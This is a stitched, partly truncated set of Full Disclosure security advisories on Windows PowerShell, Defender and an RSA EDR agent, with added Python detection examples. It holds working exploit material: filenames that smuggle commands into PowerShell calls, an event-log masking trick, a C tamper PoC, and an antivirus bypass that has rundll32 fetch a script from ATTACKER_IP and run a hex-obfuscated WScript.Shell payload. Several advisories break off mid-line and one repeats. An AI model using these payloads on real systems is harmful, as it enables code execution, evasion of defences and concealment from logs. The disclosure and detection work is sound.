"Test;saps DOOM;.xml"

2) Single quotes FAILS
'Test;saps DOOM;.xml'

3) Single quotes BYPASS
'Test.xml'

Prefixing the PowerShell API call with the "powershell" cmd is a
requirement, and this may affect many built-in PS API or module commands.

C:\Users\gg\Downloads\>powershell Start-MpScan -Scanpath 'C:\Users\gg\Downloads\Infected.zip'

Malware.exe lives in the Downloads dir; notice how we only need a partial
name as part of the .ZIP archive filename we are scanning here, and that
it also excludes the .EXE portion of that filename.


[PS Event Log Bypass]
On Windows, PowerShell event logging can be enabled to alert a SOC on
suspicious activity and/or for incident response forensic artifact
purposes. However, when bypassing PS single quotes, I noticed an
interesting side effect. The ampersand "&" character seems to truncate the
PS event log. For example, processing 'Infected.zip', the Event ID 403
logs 'infected' and not the true name of 'Malware.exe', which was actually
executed.

Want to mask the true name of the file from PowerShell Event logging?
(Malware.exe lives in the same directory)
C:\>powershell Get-Filehash  'Infected.zip'  -algorithm MD5

Below the event log HostApplication contains 'infected' and not the true
name of Malware.exe that was actually executed due to truncating.

[PS Log ID 403 Snippet]
Engine state is changed from Available to Stopped.

Details:
NewEngineState=Stopped
PreviousEngineState=Available

SequenceNumber=25

HostName=ConsoleHost
HostVersion=5.1.19041.1682
HostId=fecdc355-0e89-4d4c-a31d-7835cafa44f0
HostApplication=powershell get-filehash 'Infected
EngineVersion=5.1.19041.1682


[Exploit/POC]
powershell Get-Filehash  'Infected.zip'  -algorithm MD5

Run some malware plus bypass logging of the true file name:
C:\Users\gg\Downloads>powershell get-filehash 'Infected.zip' -algorithm md5
The PE file Malware.exe is in the Downloads directory; notice the .zip we
are scanning doesn't include .exe in the filename.

Defender Anti-Malware API:
powershell Start-MpScan -Scanpath
'C:\Users\gg\Downloads\Infected.zip'

Call ping cmd using double "&":
C:\>powershell Get-Filehash  'powerfail 8.8.8.8&.txt'  -algorithm  md5

Call a Windows cmd to Logoff the victim:
C:\>powershell Start-MpScan -Scanpath 'virus'

We have options:

A) to call commands use double "&" --> 'virus'
B) bypass PS event logging of the true file name and execute code use "&"
with ";" --> 'Infected.zip'


[References]
https://github.com/hyp3rlinx/PSTrojanFile
https://hyp3rlinx.altervista.org/advisories/MICROSOFT_DEFENDER_ANTI_MALWARE_POWERSHELL_API_UNINTENDED_CODE_EXECUTION.txt
https://hyp3rlinx.altervista.org/advisories/MICROSOFT-WINDOWS-POWERSHELL-UNSANITIZED-FILENAME-COMMAND-EXECUTION.txt


[Network Access]
Local


[Severity]
High


[Disclosure Timeline]
Vendor Notification: circa 2019
December 27, 2023  : Public Disclosure



[+] Disclaimer
The information contained within this advisory is supplied "as-is" with no
warranties or guarantees of fitness of use or otherwise. Permission is
hereby granted for the redistribution of this advisory, provided that it is
not altered except by reformatting it, and that due credit is given.
Permission is explicitly given for i

[FD] Microsoft Defender Anti-Malware PowerShell API - Arbitrary Code Execution

2023-12-12 Thread hyp3rlinx
[+] Credits: John Page (aka hyp3rlinx)
[+] Website: hyp3rlinx.altervista.org
[+] Source:
http://hyp3rlinx.altervista.org/advisories/MICROSOFT_DEFENDER_ANTI_MALWARE_POWERSHELL_API_UNINTENDED_CODE_EXECUTION.txt
[+] twitter.com/hyp3rlinx
[+] x.com/hyp3rlinx
[+] ISR: ApparitionSec


[Vendor]
www.microsoft.com


[Product]
Windows PowerShell


[Vulnerability Type]
Arbitrary Code Execution


[CVE Reference]
N/A


[Security Issue]
Microsoft Defender Anti-Malware and/or PS APIs can result in executing
arbitrary code. E.g. scanning a directory, a shortcut .lnk or even a
non-existent item may execute unintended code.
This vector builds upon my previous advisory and subsequent project
PSTrojanFile.

Requirements:
1) On the CL, the 'powershell' cmd is prefixed, or it is passed in by
calling PowerShell from another script
2) An executable file of the same name as the parameter lives nearby

Examples:
powershell Start-MpScan -Scanpath "C:\Users\gg\Downloads\;saps Helper;.1.zip"
(Helper.exe lives on the Desktop)

Create a directory ";saps Test" where Test.exe, Test.cmd etc. is on the
same CL path:
powershell Add-MpPreference -ControlledFolderAccessAllowedApplications ";saps Test"

Create a directory with a semicolon and drop a PE file named doom.exe in
the same path:
powershell Set-ProcessMitigation -PolicyFilePath "test;saps doom"

TODO: Update PSTrojanFile

[References]
http://hyp3rlinx.altervista.org/advisories/MICROSOFT-WINDOWS-POWERSHELL-UNSANITIZED-FILENAME-COMMAND-EXECUTION.txt
https://github.com/hyp3rlinx/PSTrojanFile
https://www.exploit-db.com/exploits/47248
https://github.com/MicrosoftDocs/windows-powershell-docs/tree/main/docset/winserver2019-ps/defender


[Video PoC URL]
https://www.youtube.com/watch?v=0Go6yJiRWP8


[Network Access]
Remote


[Severity]
High


[Disclosure Timeline]
Vendor Notification:  circa (2019)
December 7, 2023 : Public Disclosure


[+] Disclaimer
The information contained within this advisory is supplied "as-is" with no
warranties or guarantees of fitness of use or otherwise.
Permission is hereby granted for the redistribution of this advisory,
provided that it is not altered except by reformatting it, and
that due credit is given. Permission is explicitly given for insertion in
vulnerability databases and similar, provided that due credit
is given to the author. The author is not responsible for any misuse of the
information contained herein and accepts no responsibility
for any damage caused by the use or misuse of this information. The author
prohibits any malicious use of security related information
or exploits by the author or elsewhere. All content (c).

hyp3rlinx
___
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: https://seclists.org/fulldisclosure/
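An added example that is not from either advisory, serving this post and the earlier "Single Quote Code Execution / Event Log Bypass" one: a Python checker for the two artifacts they describe, a file argument that carries PowerShell statement separators (";", "&") followed by a launch token such as saps, and an Event ID 403 HostApplication field left with an unbalanced quote, which is the truncation the log bypass leaves behind. The event text is a constructed copy of the snippet in the earlier post; the launch-token list is an assumption.

```python
import re

# Constructed copy of the Event ID 403 detail text quoted in the single quote / event log post.
SAMPLE_EVENT_403 = """Engine state is changed from Available to Stopped.

Details:
NewEngineState=Stopped
PreviousEngineState=Available

SequenceNumber=25

HostName=ConsoleHost
HostVersion=5.1.19041.1682
HostId=fecdc355-0e89-4d4c-a31d-7835cafa44f0
HostApplication=powershell get-filehash 'Infected
EngineVersion=5.1.19041.1682
"""

# Constructed file arguments shaped like the ones in both posts, plus an ordinary one.
SAMPLE_ARGS = [
    "Test;saps DOOM;.xml",
    r"C:\Users\gg\Downloads\;saps Helper;.1.zip",
    "powerfail 8.8.8.8&.txt",
    "report.xml",
]

SEPARATORS = (";", "&")   # PowerShell statement separators that split a 'filename' into commands
# Tokens that launch something when they follow a separator; the list is an assumption.
LAUNCH_TOKEN_RE = re.compile(
    r'[;&]\s*(saps|start-process|start|iex|invoke-expression)\b', re.I)


def analyse_filename(arg):
    """Flag a file/path argument that carries a statement separator, and name any launch token."""
    separators = [s for s in SEPARATORS if s in arg]
    m = LAUNCH_TOKEN_RE.search(arg)
    return {
        "argument": arg,
        "separators": separators,
        "launch_token": m.group(1).lower() if m else None,
        "suspicious": bool(separators),
    }


def parse_event_details(text):
    """Return the key=value pairs from the Details block of a PowerShell engine event."""
    details = {}
    for line in text.splitlines():
        if "=" in line:
            key, value = line.split("=", 1)
            details[key.strip()] = value.strip()
    return details


def audit_host_application(event_text):
    """Check HostApplication for the truncation and separator artifacts the posts describe."""
    host_app = parse_event_details(event_text).get("HostApplication", "")
    unbalanced = host_app.count("'") % 2 == 1 or host_app.count('"') % 2 == 1
    has_separator = any(s in host_app for s in SEPARATORS)
    return {
        "host_application": host_app,
        "truncated": unbalanced,           # an opening quote with no close: the record was cut short
        "has_separator": has_separator,
        "suspicious": unbalanced or has_separator,
    }


if __name__ == "__main__":
    for arg in SAMPLE_ARGS:
        print(analyse_filename(arg))
    print(audit_host_application(SAMPLE_EVENT_403))
```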


[FD] Windows PowerShell / Trojan File RCE revisited

2023-06-09 Thread hyp3rlinx
Hi,

Windows PowerShell Filename Code Execution POC

Discovery: 2019 and revisited 2023

Since it still works, I dusted off and made minor improvements:

Execute a remote DLL using rundll32
Execute an unintended secondary PS1 script or local text-file (can be
hidden)
Updated the PS1 Trojan Filename Creator Python3 Script
First reported to Microsoft back in 2019 yet remains unfixed as of the time
of this writing.

Remote code execution via a specially crafted filename.

https://github.com/hyp3rlinx/PSTrojanFile

Thank you,
hyp3rlinx
___
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: https://seclists.org/fulldisclosure/


[FD] RSA NetWitness EDR Agent / Incorrect Access Control - Code Execution / CVE-2022-47529

2023-03-30 Thread hyp3rlinx
[+] Credits: John Page (aka hyp3rlinx)  
[+] Website: hyp3rlinx.altervista.org
[+] Source:  
http://hyp3rlinx.altervista.org/advisories/RSA_NETWITNESS_EDR_AGENT_INCORRECT_ACCESS_CONTROL_CVE-2022-47529.txt
[+] twitter.com/hyp3rlinx
[+] ISR: ApparitionSec

[Vendor]
RSA Security
www.netwitness.com


[Product]
NetWitness Endpoint EDR Agent

The RSA NetWitness detection and response (EDR) endpoint monitors
activity across all your endpoints—on and off the
network—providing deep visibility
into their security state, and it prioritizes alerts when there is an
issue. NetWitness Endpoint drastically reduces dwell time by rapidly
detecting new and non-malware attacks that other EDR solutions miss,
and it cuts the cost, time and scope of incident response.


[Vulnerability Type]
Incorrect Access Control / Code Execution


[CVE Reference]
CVE-2022-47529


[Security Issue]
CVE-2022-47529 allows local users to stop the Endpoint Windows agent
from sending the events to SIEM or make the agent run user-supplied
commands.

Insecure Win32 memory objects in Endpoint Windows Agents in the
NetWitness Platform through 12.x allow local
and admin Windows user accounts to modify the endpoint agent service
configuration:
to either disable it completely or run user-supplied code or commands,
thereby bypassing tamper-protection features via ACL modification.

Interestingly, the agent was uploaded to VirusTotal on 2022-01-05
17:24:32 UTC, months before the finding and report.

SHA-256 770005f9b2333bf713ec533ef1efd2b65083a5cfb9f8cbb805ccb2eba423cc3d
LANDeskService.exe


[Severity]
Critical


[Impact(s)]
Denial-of-Service
Arbitrary Code Execution


[Attack Vector]
To exploit, open handle to memory objects held by the endpoint agent,
modify the ACL for the ones that have insecure ACLs, and DENY access
to Everyone group


[Affected Product Code Base]
All versions prior to v12.2


[Network Access]
Local


[References]
https://community.netwitness.com/t5/netwitness-platform-security/nw-2023-04-netwitness-platform-security-advisory-cve-2022-47529/ta-p/696935


[Vuln Code Block]:
00000001400F7B10 sub_1400F7B10   proc near               ; CODE XREF: sub_14012F6F0+19B↓p
.text:00000001400F7B10                                   ; sub_14013BA50+19↓p
.text:00000001400F7B10                                   ; DATA XREF: ...
.text:00000001400F7B10                 push    rbx
.text:00000001400F7B12                 sub     rsp, 20h
.text:00000001400F7B16                 mov     rbx, rcx
.text:00000001400F7B19                 test    rcx, rcx
.text:00000001400F7B1C                 jz      short loc_1400F7B5C
.text:00000001400F7B1E                 call    cs:InitializeCriticalSection
.text:00000001400F7B24                 lea     rcx, [rbx+28h]  ; lpCriticalSection
.text:00000001400F7B28                 call    cs:InitializeCriticalSection
.text:00000001400F7B2E                 mov     edx, 1          ; bManualReset
.text:00000001400F7B33                 xor     r9d, r9d        ; lpName
.text:00000001400F7B36                 mov     r8d, edx        ; bInitialState
.text:00000001400F7B39                 xor     ecx, ecx        ; lpEventAttributes
.text:00000001400F7B3B                 call    cs:CreateEventW
.text:00000001400F7B41                 mov     [rbx+50h], rax
.text:00000001400F7B45                 mov     dword ptr [rbx+58h], 0
.text:00000001400F7B4C                 test    rax, rax
.text:00000001400F7B4F                 jz      short loc_1400F7B5C



[Exploit/POC]
"RSA_NetWitness_Exploit.c"

#include "windows.h"
#include "stdio.h"
#include "accctrl.h"
#include "aclapi.h"

#define OPEN_ALL_ACCESS 0x1F0003

/*
RSA NetWitness EDR Endpoint Agent
Tamper Protection Bypass / EoP Code Execution
RSA NetWitness.msi --> NWEAgent.exe
MD5: c0aa7e52cbf7799161bac9ebefa38d49

Expected result: Low privileged standard users are prevented from
interfering with and or modifying events for the RSA Endpoint Agent.
Actual result: RSA NetWitness Endpoint Agent is terminated by a low
privileged standard non-administrator user.

By John Page (hyp3rlinx) - Nov 2022

DISCLAIMER: The author of this code is not responsible or liable for
any damages whatsoever from testing, modifying and or misuse.
Users of this supplied PoC code accept all risks, do no harm.

X64 PE file vuln code block:

00000001400F7B10 sub_1400F7B10   proc near               ; CODE XREF: sub_14012F6F0+19B↓p
.text:00000001400F7B10                                   ; sub_14013BA50+19↓p
.text:00000001400F7B10                                   ; DATA XREF: ...
.text:00000001400F7B10                 push    rbx
.text:00000001400F7B12                 sub     rsp, 20h
.text:00000001400F7B16                 mov     rbx, rcx
.text:00000001400F7B19                 test    rcx, rcx
.text:00000001400F7B1C                 jz      short loc_1400F7B5C
.text:00000001400F7B1E                 call    cs:InitializeCriticalSection
.text:0

[FD] RSA NetWitness Platform EDR / Incorrect Access Control - Code Execution

2023-03-27 Thread hyp3rlinx

[+] Credits: John Page (aka hyp3rlinx)  
[+] Website: hyp3rlinx.altervista.org
[+] Source:  
http://hyp3rlinx.altervista.org/advisories/RSA_NETWITNESS_EDR_AGENT_INCORRECT_ACCESS_CONTROL_CVE-2022-47529.txt
[+] twitter.com/hyp3rlinx
[+] ISR: ApparitionSec 
 
[Vendor]
RSA Security
www.netwitness.com


[Product]
NetWitness Endpoint EDR Agent

The RSA NetWitness detection and response (EDR) endpoint monitors activity 
across all your endpoints—on and off the network—providing deep visibility
into their security state, and it prioritizes alerts when there is an issue. 
NetWitness Endpoint drastically reduces dwell time by rapidly
detecting new and non-malware attacks that other EDR solutions miss, and it 
cuts the cost, time and scope of incident response.


[Vulnerability Type]
Incorrect Access Control / Code Execution


[CVE Reference]
CVE-2022-47529


[Security Issue]
CVE-2022-47529 allows local users to stop the Endpoint Windows agent from 
sending the events to SIEM or make the agent run user-supplied commands.

Insecure Win32 memory objects in Endpoint Windows Agents in the NetWitness 
Platform through 12.x allow local
and admin Windows user accounts to modify the endpoint agent service 
configuration:
to either disable it completely or run user-supplied code or commands, thereby 
bypassing tamper-protection features via ACL modification.

Interestingly, the agent was uploaded to virustotal on 2022-01-05 17:24:32 UTC 
months before finding and report.

SHA-256 770005f9b2333bf713ec533ef1efd2b65083a5cfb9f8cbb805ccb2eba423cc3d
LANDeskService.exe


[Severity]
Critical


[Impact(s)]
Denial-of-Service 
Arbitrary Code Execution


[Attack Vector]
To exploit, open handle to memory objects held by the endpoint agent, 
modify the ACL for the ones that have insecure ACLs, and DENY access to 
Everyone group


[Affected Product Code Base]
All versions prior to v12.2


[Network Access]
Local


[References]
https://community.netwitness.com/t5/netwitness-platform-security/nw-2023-04-netwitness-platform-security-advisory-cve-2022-47529/ta-p/696935


[Vuln Code Block]:
00000001400F7B10 sub_1400F7B10   proc near               ; CODE XREF: sub_14012F6F0+19B↓p
.text:00000001400F7B10                                   ; sub_14013BA50+19↓p
.text:00000001400F7B10                                   ; DATA XREF: ...
.text:00000001400F7B10                 push    rbx
.text:00000001400F7B12                 sub     rsp, 20h
.text:00000001400F7B16                 mov     rbx, rcx
.text:00000001400F7B19                 test    rcx, rcx
.text:00000001400F7B1C                 jz      short loc_1400F7B5C
.text:00000001400F7B1E                 call    cs:InitializeCriticalSection
.text:00000001400F7B24                 lea     rcx, [rbx+28h]  ; lpCriticalSection
.text:00000001400F7B28                 call    cs:InitializeCriticalSection
.text:00000001400F7B2E                 mov     edx, 1          ; bManualReset
.text:00000001400F7B33                 xor     r9d, r9d        ; lpName
.text:00000001400F7B36                 mov     r8d, edx        ; bInitialState
.text:00000001400F7B39                 xor     ecx, ecx        ; lpEventAttributes
.text:00000001400F7B3B                 call    cs:CreateEventW
.text:00000001400F7B41                 mov     [rbx+50h], rax
.text:00000001400F7B45                 mov     dword ptr [rbx+58h], 0
.text:00000001400F7B4C                 test    rax, rax
.text:00000001400F7B4F                 jz      short loc_1400F7B5C



[Exploit/POC]
"RSA_NetWitness_Exploit.c"

#include "windows.h"
#include "stdio.h"
#include "accctrl.h"
#include "aclapi.h"

#define OPEN_ALL_ACCESS 0x1F0003

/*
RSA NetWitness EDR Endpoint Agent
Tamper Protection Bypass / EoP Code Execution
RSA NetWitness.msi --> NWEAgent.exe
MD5: c0aa7e52cbf7799161bac9ebefa38d49

Expected result: Low privileged standard users are prevented from interfering 
with and or modifying events for the RSA Endpoint Agent.
Actual result: RSA NetWitness Endpoint Agent is terminated by a low privileged 
standard non-administrator user.

By John Page (hyp3rlinx) - Nov 2022 

DISCLAIMER: The author of this code is not responsible or liable for any 
damages whatsoever from testing, modifying and or misuse.
Users of this supplied PoC code accept all risks, do no harm. 

X64 PE file vuln code block:

00000001400F7B10 sub_1400F7B10   proc near               ; CODE XREF: sub_14012F6F0+19B↓p
.text:00000001400F7B10                                   ; sub_14013BA50+19↓p
.text:00000001400F7B10                                   ; DATA XREF: ...
.text:00000001400F7B10                 push    rbx
.text:00000001400F7B12                 sub     rsp, 20h
.text:00000001400F7B16                 mov     rbx, rcx
.text:00000001400F7B19                 test    rcx, rcx
.text:00000001400F7B1C                 jz      short loc_1400F7B5C
.text:00000001400F7B1E                 call
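
The advisory's attack vector is an access check going the attacker's way: if an object the agent depends on carries a DACL that grants WRITE_DAC to Everyone, any local user can rewrite that DACL and put an access-denied ACE for Everyone in front of it, after which the agent's own service account is refused the object too. The model below is an added example (not the PoC, whose C source is cut off above, and not NetWitness code): it implements the ordered DACL walk that Windows performs, then runs the tamper step against a constructed over-permissive DACL and a constructed hardened one. EVENT_ALL_ACCESS is 0x1F0003, the value the PoC's OPEN_ALL_ACCESS macro uses; the user SID, the DACL contents, and the omission of owner-implied rights and privileges are assumptions made for the illustration.

```python
from dataclasses import dataclass
from typing import Dict, List, Optional, Set

# Win32 access-mask bits. 0x1F0003, the PoC's OPEN_ALL_ACCESS, is EVENT_ALL_ACCESS.
READ_CONTROL = 0x00020000
WRITE_DAC = 0x00040000
SYNCHRONIZE = 0x00100000
EVENT_MODIFY_STATE = 0x00000002
EVENT_ALL_ACCESS = 0x001F0003

# Well-known SIDs; the user's own SID is a constructed placeholder.
EVERYONE = "S-1-1-0"
USERS = "S-1-5-32-545"
ADMINS = "S-1-5-32-544"
SYSTEM = "S-1-5-18"
SOME_USER = "S-1-5-21-0-0-0-1001"  # constructed

# A token is modelled as the set of SIDs it carries; every token carries Everyone.
STANDARD_USER: Set[str] = {SOME_USER, USERS, EVERYONE}
SERVICE: Set[str] = {SYSTEM, ADMINS, EVERYONE}


@dataclass
class Ace:
    kind: str  # "allow" or "deny"
    sid: str
    mask: int


@dataclass
class Dacl:
    aces: Optional[List[Ace]]  # None models a NULL DACL, which protects nothing


def access_check(dacl: Dacl, token: Set[str], desired: int) -> bool:
    """Ordered DACL walk as Windows performs it: an ACE applies when its SID is in
    the token; a deny ACE that covers any still-ungranted desired right fails the
    check; allow ACEs accumulate rights until every desired bit is granted.
    Simplification (assumption): owner-implied READ_CONTROL/WRITE_DAC and
    privileges such as SeTakeOwnership are left out."""
    if dacl.aces is None:
        return True
    granted = 0
    for ace in dacl.aces:
        if ace.sid not in token:
            continue
        remaining = desired & ~granted
        if ace.kind == "deny" and ace.mask & remaining:
            return False
        if ace.kind == "allow":
            granted |= ace.mask & desired
            if granted == desired:
                return True
    return granted == desired


def tamper(dacl: Dacl, attacker: Set[str]) -> bool:
    """The advisory's attack vector: open the object with WRITE_DAC, then put an
    access-denied ACE for Everyone at the front of the DACL."""
    if not access_check(dacl, attacker, WRITE_DAC):
        return False
    if dacl.aces is None:
        dacl.aces = []
    dacl.aces.insert(0, Ace("deny", EVERYONE, EVENT_ALL_ACCESS))
    return True


def weak_event_dacl() -> Dacl:
    # Constructed: a DACL that hands Everyone full access, WRITE_DAC included.
    return Dacl([Ace("allow", SYSTEM, EVENT_ALL_ACCESS),
                 Ace("allow", EVERYONE, EVENT_ALL_ACCESS)])


def hardened_event_dacl() -> Dacl:
    # Constructed: only the service account can signal or re-ACL the object;
    # everyone else gets at most SYNCHRONIZE, so a standard user cannot tamper.
    return Dacl([Ace("allow", SYSTEM, EVENT_ALL_ACCESS),
                 Ace("allow", ADMINS, READ_CONTROL | SYNCHRONIZE),
                 Ace("allow", EVERYONE, SYNCHRONIZE)])


def simulate(dacl: Dacl, attacker: Set[str], service: Set[str]) -> Dict[str, bool]:
    """Whether the attacker could rewrite the DACL, and whether the service can
    still signal its own event afterwards (False means the agent is wedged)."""
    rewrote = tamper(dacl, attacker)
    return {
        "attacker_rewrote_dacl": rewrote,
        "service_can_signal": access_check(dacl, service, EVENT_MODIFY_STATE),
    }


if __name__ == "__main__":
    for name, factory in (("weak", weak_event_dacl), ("hardened", hardened_event_dacl)):
        print(name, simulate(factory(), STANDARD_USER, SERVICE))
```

The fix the model points at is the one the vendor advisory implies: the DACL applied at object creation must not hand WRITE_DAC (or a full-access mask that includes it) to Everyone or Users, and a NULL DACL is the worst case because it grants everything to everyone.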

[FD] Microsoft Windows Contact File / Remote Code Execution (Resurrected) CVE-2022-44666

2023-02-27 Thread hyp3rlinx
[-] Microsoft Windows Contact file / Remote Code Execution (Resurrected
2022)  / CVE-2022-44666

[+] John Page (aka hyp3rlinx)
[+] twitter.com/hyp3rlinx
[+] ISR: ApparitionSec

Back in 2018 I discovered three related Windows remote code execution
vulnerabilities affecting both VCF and Contact files. They were purchased
by Trend Micro Zero Day Initiative (@thezdi) from me and received candidate
identifiers ZDI-CAN-6920 and ZDI-CAN-7591. Microsoft as usual denied a fix
and it was subsequently dropped as a zero day on January 10, 2019 in
coordination with the ZDI program.

Almost five years passed, until researcher j00sean resurrected the flaws to
add additional protocol vectors LDAP etc. Microsoft finally decided to
patch and assign CVE-2022-44666 even though the vulnerabilities are exactly
the same.

Old 2019 advisories:
====================
1) Windows VCF RCE
http://hyp3rlinx.altervista.org/advisories/MICROSOFT-WINDOWS-VCF-FILE-INSUFFICIENT-WARNING-REMOTE-CODE-EXECUTION.txt

2) Windows Contact HTML injection
http://hyp3rlinx.altervista.org/advisories/MICROSOFT-WINDOWS-CONTACT-FILE-HTML-INJECTION-MAILTO-LINK-ARBITRARY-CODE-EXECUTION.txt

3) Windows Contact RCE
http://hyp3rlinx.altervista.org/advisories/MICROSOFT-WINDOWS-CONTACT-FILE-INSUFFECIENT-UI-WARNING-WEBSITE-LINK-ARBITRARY-CODE-EXECUTION.txt

Circa 2022 updated:
===================
https://github.com/j00sean/CVE-2022-44666#readme
https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2022-44666

Additional References:
======================
https://www.zerodayinitiative.com/advisories/ZDI-19-013/
https://www.zdnet.com/article/poc-for-windows-vcf-zero-day-published-online/
https://thehackernews.com/2019/01/vcard-windows-hacking.html
https://twitter.com/hyp3rlinx/status/1083528552253919232
https://seclists.org/bugtraq/2019/Jan/43
https://vimeo.com/312824315
https://www.exploit-db.com/exploits/46167
https://www.rapid7.com/db/modules/exploit/windows/fileformat/microsoft_windows_contact/


Special thanks to j00sean for his work and resurrecting this vulnerability
from the dead and helping deal with M$

hyp3rlinx


[FD] Microsoft Windows Defender / Detection Bypass

2022-01-11 Thread hyp3rlinx
[+] Credits: John Page (aka hyp3rlinx)
[+] Website: hyp3rlinx.altervista.org
[+] Source:  
http://hyp3rlinx.altervista.org/advisories/MICROSOFT_WINDOWS_DEFENDER_DETECTION_BYPASS.txt
[+] twitter.com/hyp3rlinx
[+] ISR: ApparitionSec


[Vendor]
www.microsoft.com


[Product]
Windows Defender

Microsoft Defender Antivirus is a major component of your next-generation
protection in Microsoft Defender for Endpoint. This protection brings together
machine learning, big-data analysis, in-depth threat resistance research, and
the Microsoft cloud infrastructure to protect devices (or endpoints) in your
organization. Microsoft Defender Antivirus is built into Windows, and it works
with Microsoft Defender for Endpoint to provide protection on your device and
in the cloud.


[Vulnerability Type]
Windows Defender Detection Bypass
Trojan:Win32/Powessere.G - Backdoor:JS/Relvelshe.A


[CVE Reference]
N/A


[Security Issue]
Currently, Windows Defender detects and prevents Trojan:Win32/Powessere.G aka
"POWERLIKS" type execution that leverages rundll32.exe. Attempts at execution
fail and attackers will get an "Access is denied" error message. However, it
can be easily bypassed by passing an extra path traversal when referencing
mshtml.

C:\>rundll32.exe javascript:"\..\..\mshtml,RunHTMLApplication ";alert(1)
Access is denied.

Pass an extra "..\" to the path.
C:\>rundll32.exe javascript:"\..\..\..\mshtml,RunHTMLApplication ";alert(666)

Windows Defender also detects based on the following javascript call
using GetObject("script:http://ATTACKER_IP/hi.tmp").
However, that interference can be bypassed by using concatenation when
constructing the URL scheme portion of the payload.

C:\>rundll32.exe javascript:"\..\..\..\mshtml,RunHTMLApplication
";document.write();GetObject("script:http://ATTACKER_IP/hi.tmp")
Access is denied.

Full bypass E.g.

C:\>rundll32.exe javascript:"\..\..\..\mshtml,RunHTMLApplication
";document.write();GetObject("script"+":"+"http://ATTACKER_IP/hi.tmp")

Enter, Backdoor:JS/Relvelshe.A detection.

Windows Defender also prevents downloaded code execution, detected as
"Backdoor:JS/Relvelshe.A" and is removed by Windows Defender once it
hits InetCache.
"C:\Users\victim\AppData\Local\Microsoft\Windows\INetCache\IE\2MH5KJXI\hi.tmp[1]"

However, this is easily bypassed by hex encoding our payload code new
ActiveXObject("WScript.Shell").Run("calc.exe"). Then, call
String.fromCharCode(parseInt(hex.substr(n, 2), 16)) to decode it on the fly,
passing the value to JScript's built-in eval function.


[References]
Trojan:Win32/Powessere.G
https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=Trojan%3AWin32%2FPowessere.G%21lnk=2147752427

Backdoor:JS/Relvelshe.A
https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=Backdoor:JS/Relvelshe.A=2147744426

Advisory:
https://twitter.com/hyp3rlinx/status/1480651583172091904


[Exploit/PoC]
1) Remote code Jscript component "hi.tmp", host on server port 80, it
pops calc.exe using WScript.Shell and defeats Backdoor:JS/Relvelshe.A
detection.

python -m http.server 80

"hi.tmp"




<![CDATA[
var hex = 
"6E657720416374697665584F626A6563742822575363726970742E5368656C6C22292E52756E282263616C632E6578652229";
var str = '';
for (var n = 0; n < hex.length; n += 2) {
str += String.fromCharCode(parseInt(hex.substr(n, 2), 16));
}
eval(str)
]]>




2) C:\>rundll32.exe javascript:"\..\..\..\mshtml,RunHTMLApplication
";document.write();GetObject("script"+":"+"http://ATTACKER_IP/hi.tmp")


BOOM!


[Network Access]
Local


[Severity]
High


[Disclosure Timeline]
January 10, 2022 : Public Disclosure


[+] Disclaimer
The information contained within this advisory is supplied "as-is"
with no warranties or guarantees of fitness of use or otherwise.
Permission is hereby granted for the redistribution of this advisory,
provided that it is not altered except by reformatting it, and
that due credit is given. Permission is explicitly given for insertion
in vulnerability databases and similar, provided that due credit
is given to the author. The author is not responsible for any misuse
of the information contained herein and accepts no responsibility
for any damage caused by the use or misuse of this information. The
author prohibits any malicious use of security related information
or exploits by the author or elsewhere. All content (c).

hyp3rlinx

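
The post's two evasions, the extra ..\ traversal and the "script"+":" concatenation, both change the text of the command line without changing what rundll32 and mshtml actually do, and the hex string in hi.tmp keeps the WScript.Shell call out of anything that matches on the raw file. The detection logic below is an added example (not code from the post, and not a Microsoft signature) showing how a rule can normalize those forms away before matching and decode long hex literals the same way the scriptlet does at runtime. The command lines and the scriptlet body are constructed from the ones quoted above; the tag names and the 32-hex-digit minimum are my own choices.

```python
import re
from typing import List

# Constructed command lines modelled on the ones quoted in the post
# (ATTACKER_IP is the post's own placeholder, not a real host).
SAMPLE_CMDLINES = [
    r'rundll32.exe javascript:"\..\..\mshtml,RunHTMLApplication ";alert(1)',
    r'rundll32.exe javascript:"\..\..\..\mshtml,RunHTMLApplication ";alert(666)',
    r'rundll32.exe javascript:"\..\..\..\mshtml,RunHTMLApplication ";document.write();'
    r'GetObject("script"+":"+"http://ATTACKER_IP/hi.tmp")',
    r'rundll32.exe shell32.dll,Control_RunDLL',  # benign, for contrast
]

# Constructed scriptlet body with the same decode-then-eval shape as hi.tmp.
SAMPLE_SCRIPTLET = r"""
var hex = "6E657720416374697665584F626A6563742822575363726970742E5368656C6C22292E52756E282263616C632E6578652229";
var str = '';
for (var n = 0; n < hex.length; n += 2) {
    str += String.fromCharCode(parseInt(hex.substr(n, 2), 16));
}
eval(str)
"""

TRAVERSAL_RUN = re.compile(r'(?:\\\.\.){2,}')        # \..\..\.. -> \..
STRING_CONCAT = re.compile(r'(["\'])\s*\+\s*\1')     # "a"+"b" -> "ab"
GETOBJECT_SCRIPT = re.compile(r'getobject\(\s*["\']script:')
HEX_LITERAL = re.compile(r'["\']([0-9A-Fa-f]{32,})["\']')


def normalize_cmdline(cmdline: str) -> str:
    """Undo the two evasions before matching: collapse any run of dot-dot
    traversals to a single one, and join adjacent string literals so that
    "script"+":"+"http://..." reads as script:http://... again."""
    s = cmdline.lower()
    s = TRAVERSAL_RUN.sub(r'\\..', s)
    return STRING_CONCAT.sub('', s)


def classify_cmdline(cmdline: str) -> List[str]:
    """Tags for a process command line; an empty list means nothing matched."""
    n = normalize_cmdline(cmdline)
    tags: List[str] = []
    if all(k in n for k in ('rundll32', 'javascript:', 'mshtml', 'runhtmlapplication')):
        tags.append('rundll32_mshtml_runhtmlapplication')
    if GETOBJECT_SCRIPT.search(n):
        tags.append('getobject_script_moniker')
    return tags


def decode_hex_literals(script: str) -> List[str]:
    """Decode long hex string literals the way the scriptlet does at runtime
    (two hex digits per character) so the real payload text can be matched."""
    decoded: List[str] = []
    for m in HEX_LITERAL.finditer(script):
        h = m.group(1)
        if len(h) % 2:
            continue
        text = bytes.fromhex(h).decode('latin-1')
        if text.isprintable():
            decoded.append(text)
    return decoded


def scan_scriptlet(script: str) -> List[str]:
    """Tags for a downloaded scriptlet body: a decode-then-eval construct, and a
    WScript.Shell call that only exists after decoding."""
    tags: List[str] = []
    low = script.lower()
    if 'fromcharcode' in low and 'eval(' in low:
        tags.append('runtime_decode_then_eval')
    for text in decode_hex_literals(script):
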